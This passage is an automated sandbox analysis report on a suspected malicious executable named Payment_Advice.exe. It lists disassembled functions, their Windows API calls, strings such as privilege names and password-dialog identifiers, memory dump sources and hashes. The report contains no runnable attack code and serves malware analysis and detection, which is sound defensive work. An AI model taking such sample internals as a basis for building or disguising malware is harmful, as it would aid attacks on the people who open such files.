                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 005298D7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 005298E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 0b6358481315d27a0f2a266a60647fcbb995a08cb699e0c86eabee068e391864
                                                                                                    • Instruction ID: 8100538897af244bb220c9b82b13cad749d411c13faa6af30948cc9905ccb12f
                                                                                                    • Opcode Fuzzy Hash: 0b6358481315d27a0f2a266a60647fcbb995a08cb699e0c86eabee068e391864
                                                                                                    • Instruction Fuzzy Hash: 3301D1371446326BD3162274BC8D92A2E69FFE3760F290538F505923D2FE308C0A6121
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00510EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 005111CF: ResetEvent.KERNEL32(?), ref: 005111E1
                                                                                                      • Part of subcall function 005111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005111F5
                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00510F21
                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00510F3B
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00510F54
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00510F60
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00510F6C
                                                                                                      • Part of subcall function 00510FE4: WaitForSingleObject.KERNEL32(?,000000FF,00511101,?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FEA
                                                                                                      • Part of subcall function 00510FE4: GetLastError.KERNEL32(?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1868215902-0
                                                                                                    • Opcode ID: 95b75ad9692dd6ec4a5f726f72c09bce7302c646f7a1cabaa1c95c80adbd3a0e
                                                                                                    • Instruction ID: 4c2c2425cf97e658281164c024dfc26a9515b168223fae85fac2a1ae502e6c68
                                                                                                    • Opcode Fuzzy Hash: 95b75ad9692dd6ec4a5f726f72c09bce7302c646f7a1cabaa1c95c80adbd3a0e
                                                                                                    • Instruction Fuzzy Hash: 7B01B575400B40EFD7229B64DC89FC6FBA9FB08711F000929F25B921A0CBB57A89DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0052C817
                                                                                                      • Part of subcall function 00528DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?), ref: 00528DE2
                                                                                                      • Part of subcall function 00528DCC: GetLastError.KERNEL32(?,?,0052C896,?,00000000,?,00000000,?,0052C8BD,?,00000007,?,?,0052CCBA,?,?), ref: 00528DF4
                                                                                                    • _free.LIBCMT ref: 0052C829
                                                                                                    • _free.LIBCMT ref: 0052C83B
                                                                                                    • _free.LIBCMT ref: 0052C84D
                                                                                                    • _free.LIBCMT ref: 0052C85F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 5d65e918d9b412d7c543b3666a55825eea08cc8a7568fa8644fc81768ea2c260
                                                                                                    • Instruction ID: 549e0d1b38ec17c5b1f9541452ef0a12077b48896c05d329bcd7f1b21fec21cc
                                                                                                    • Opcode Fuzzy Hash: 5d65e918d9b412d7c543b3666a55825eea08cc8a7568fa8644fc81768ea2c260
                                                                                                    • Instruction Fuzzy Hash: 54F0FF33505221AB9620DBA8F88BC2B7FEDBF527147645C19F109D76E2CB70FC849A54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00511FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00511FE5
                                                                                                    • _wcslen.LIBCMT ref: 00511FF6
                                                                                                    • _wcslen.LIBCMT ref: 00512006
                                                                                                    • _wcslen.LIBCMT ref: 00512014
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0050B371,?,?,00000000,?,?,?), ref: 0051202F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397213944-0
                                                                                                    • Opcode ID: 3a9f5a43f1c9cca28fb3b5910cc6613fe8e6cb611a96d33a7b0518383e7cdf39
                                                                                                    • Instruction ID: 78131267b87d1e867e2af3d5c1dd819276b91984632f580c8b3e2186c2a66932
                                                                                                    • Opcode Fuzzy Hash: 3a9f5a43f1c9cca28fb3b5910cc6613fe8e6cb611a96d33a7b0518383e7cdf39
                                                                                                    • Instruction Fuzzy Hash: 60F01D32008025BBDF266F51EC0DDCA7F2AFF85760F128415F65A5E0A1CB72DAA5D690
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _swprintf
                                                                                                    • String ID: %ls$%s: %s
                                                                                                    • API String ID: 589789837-2259941744
                                                                                                    • Opcode ID: faa0d5ddfeefbd0262373ddd44878d96f9a009b39f9b772356d8af72146c91a1
                                                                                                    • Instruction ID: 7d0cd1e8c9cbe7fc9c57be8dc9165b868dd5ba379d374f8e518e77528b7f4d7d
                                                                                                    • Opcode Fuzzy Hash: faa0d5ddfeefbd0262373ddd44878d96f9a009b39f9b772356d8af72146c91a1
                                                                                                    • Instruction Fuzzy Hash: BC51DA35248B01F6FA112A908D4BFF57E65BB05B04F288DC6F386648E1D6A3A4D1A71E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00527F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Advice.exe,00000104), ref: 00527FAE
                                                                                                    • _free.LIBCMT ref: 00528079
                                                                                                    • _free.LIBCMT ref: 00528083
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                    • API String ID: 2506810119-31765992
                                                                                                    • Opcode ID: bf0881ce6eeb500beaf25a51835c250967e39caff6d577404df6831e22345f8c
                                                                                                    • Instruction ID: 25f4c843ea1e187ed95a6220f44e49f10e5447aa3862bfcbfc03cd74f5f7fd46
                                                                                                    • Opcode Fuzzy Hash: bf0881ce6eeb500beaf25a51835c250967e39caff6d577404df6831e22345f8c
                                                                                                    • Instruction Fuzzy Hash: BF31B571A05629EFDB21DF99E8889AEBFBCFF96310F104066F40497290DA708E48CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005231FB
                                                                                                    • _abort.LIBCMT ref: 00523306
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer_abort
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 948111806-2084237596
                                                                                                    • Opcode ID: 131a47f9a0ff2747ebd55310db4f7785b8b63903133b2bfa024ce24b8dc541a4
                                                                                                    • Instruction ID: 9ab9d5381831e50d8345c94a43d2f0bd39e26bea5f95844c68ee81fc5c73cd98
                                                                                                    • Opcode Fuzzy Hash: 131a47f9a0ff2747ebd55310db4f7785b8b63903133b2bfa024ce24b8dc541a4
                                                                                                    • Instruction Fuzzy Hash: 0E415975900229EFCF16DF94EC81AAEBFB5BF49304F148099F904A7292D339EA50DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00507401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00507406
                                                                                                      • Part of subcall function 00503BBA: __EH_prolog.LIBCMT ref: 00503BBF
                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 005074CD
                                                                                                      • Part of subcall function 00507A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00507AAB
                                                                                                      • Part of subcall function 00507A9C: GetLastError.KERNEL32 ref: 00507AF1
                                                                                                      • Part of subcall function 00507A9C: CloseHandle.KERNEL32(?), ref: 00507B00
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                    • API String ID: 3813983858-639343689
                                                                                                    • Opcode ID: 6bef6ef73e1123b443f5731d5db5384f38646f2d95802ebeba9db59da60c1dff
                                                                                                    • Instruction ID: 2dac12203163fd1cc7f19e423966dbe9479e8f7fb90955ed3a42aa39651188f5
                                                                                                    • Opcode Fuzzy Hash: 6bef6ef73e1123b443f5731d5db5384f38646f2d95802ebeba9db59da60c1dff
                                                                                                    • Instruction Fuzzy Hash: E231F471E0424D6BEF10EBA4CC49BEE7FA8BF59304F004055F805A72C2D774AA88CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051AD98
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0051ADAD
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0051ADC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: ASKNEXTVOL
                                                                                                    • API String ID: 445417207-3402441367
                                                                                                    • Opcode ID: aecd213fded1ac8d1dcf87237d458855522bfb5b8ec6bc968af809185221e6f7
                                                                                                    • Instruction ID: 986836732c8b759c6d97ebd38dbf4ddcfc7187258d6577bded82778d08296e3c
                                                                                                    • Opcode Fuzzy Hash: aecd213fded1ac8d1dcf87237d458855522bfb5b8ec6bc968af809185221e6f7
                                                                                                    • Instruction Fuzzy Hash: 6F11B732241A01AFF7138F6CAD49FEA3F69FB5A702F040410F241D74A4C7A29D49A726
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DDA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(00010440), ref: 0051DDDC
                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010440,0051B270,?,?), ref: 0051DE18
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogParamVisibleWindow
                                                                                                    • String ID: GETPASSWORD1$xzU
                                                                                                    • API String ID: 3157717868-150693504
                                                                                                    • Opcode ID: cee7234e820048030aed0bf0d0c701eedd2e6d7b2e26ce013769174b0990a3f7
                                                                                                    • Instruction ID: e1e41132306693be0cf925b77bde5b1c7b301d50738a5c8d0cd748978f0978bb
                                                                                                    • Opcode Fuzzy Hash: cee7234e820048030aed0bf0d0c701eedd2e6d7b2e26ce013769174b0990a3f7
                                                                                                    • Instruction Fuzzy Hash: 68113832604144AAEF119A34AC06BFF3FA8BB5A316F144464FD49AB081CBB4ACC8D370
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __fprintf_l.LIBCMT ref: 0050D954
                                                                                                    • _strncpy.LIBCMT ref: 0050D99A
                                                                                                      • Part of subcall function 00511DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00541030,?,0050D928,00000000,?,00000050,00541030), ref: 00511DC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                    • String ID: $%s$@%s
                                                                                                    • API String ID: 562999700-834177443
                                                                                                    • Opcode ID: 221f23694edb671f4343298fb1c39c4a26774b6dd4a45f9130502e6f4a275a2b
                                                                                                    • Instruction ID: c666c6aeb48e143927657596f857e07292520c0611ee0bdd268c8f08814b7b5f
                                                                                                    • Opcode Fuzzy Hash: 221f23694edb671f4343298fb1c39c4a26774b6dd4a45f9130502e6f4a275a2b
                                                                                                    • Instruction Fuzzy Hash: EA217272540249AEEB21EEE4DC46FEE7FF8BF05704F040912F911961E2E272D658CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00510E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E85
                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E8F
                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0050AC5A,00000008,?,00000000,?,0050D22D,?,00000000), ref: 00510E9F
                                                                                                    Strings
                                                                                                    • Thread pool initialization failed., xrefs: 00510EB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                    • Opcode ID: ff25426eab899fb6a957546ae4c0d4e8249e6d12f405ccd5a164d11367afec9a
                                                                                                    • Instruction ID: 96d32eb135b1c44c0b86c8e5f164788e6f2f483b9db35b1b7bf8d3c516c7a450
                                                                                                    • Opcode Fuzzy Hash: ff25426eab899fb6a957546ae4c0d4e8249e6d12f405ccd5a164d11367afec9a
                                                                                                    • Instruction Fuzzy Hash: 5B118FB16407089BD3315F669C889ABFFECFB64744F144D2EE1DAC2240D6B199C08B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: (Q$2Q$A
                                                                                                    • API String ID: 2696272793-1263153503
                                                                                                    • Opcode ID: bb9d7e518f02b43995384eabc455772a19c4897584431e02fee372149c18bf8d
                                                                                                    • Instruction ID: 4f44d077537141e6dc6fff197e8ddaf6d9f08af1103d301d1ba310cffe14d6eb
                                                                                                    • Opcode Fuzzy Hash: bb9d7e518f02b43995384eabc455772a19c4897584431e02fee372149c18bf8d
                                                                                                    • Instruction Fuzzy Hash: E2011B75901219ABCF14CFA5D8489DEBBF8BF09310B10415AE905E3240D7749A44DF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
